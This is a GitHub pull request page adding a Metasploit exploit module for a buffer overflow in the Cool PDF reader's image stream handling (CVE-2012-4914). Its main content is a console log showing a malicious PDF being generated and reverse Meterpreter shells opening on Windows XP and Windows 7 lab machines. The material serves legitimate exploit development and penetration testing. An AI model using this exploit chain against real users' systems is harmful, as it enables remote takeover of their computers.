added module for cve-2012-4914 #1610

Merged
merged 2 commits into from Mar 19, 2013

Conversation

Projects
None yet
3 participants
@jvazquez-r7
Contributor

jvazquez-r7 commented Mar 17, 2013

Tested on Cool PDF 3.0.2.256 over Windows XP SP3 and Windows 7 SP1

vulnerable app can be downloaded from

http://www.exploit-db.com/wp-content/themes/exploit/applications/29e2770f70e2ee702d2d60658024d976-CoolPDFReader.exe

msf  exploit(handler) > use exploit/windows/fileformat/coolpdf_image_stream_bof 
msf  exploit(coolpdf_image_stream_bof) > rexploit
[*] Reloading module...

[+] msf.pdf stored at /Users/juan/.msf4/local/msf.pdf
msf  exploit(coolpdf_image_stream_bof) > use exploit/multi/handler 
msf  exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.1.136
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.136:1691) at 2013-03-17 21:09:39 +0100

meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.136 - Meterpreter session 1 closed.  Reason: User exit
msf  exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.1.130
[*] Meterpreter session 2 opened (192.168.1.128:4444 -> 192.168.1.130:49255) at 2013-03-17 21:10:29 +0100

meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...


@zeroSteiner

This comment has been minimized.

Show comment
Hide comment
@zeroSteiner

zeroSteiner Mar 18, 2013

I don't think these lines are necessary.

I don't think these lines are necessary.

This comment has been minimized.

Show comment
Hide comment
@jvazquez-r7

jvazquez-r7 Mar 18, 2013

Owner

you're right, debug .... thanks ;)

Owner

jvazquez-r7 replied Mar 18, 2013

you're right, debug .... thanks ;)

@wchen-r7 wchen-r7 merged commit 4aab1cc into rapid7:master Mar 19, 2013

1 check passed

default The Travis build passed
Details

@jvazquez-r7 jvazquez-r7 deleted the jvazquez-r7:coolpdf_image_stream_bof branch Nov 18, 2014

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment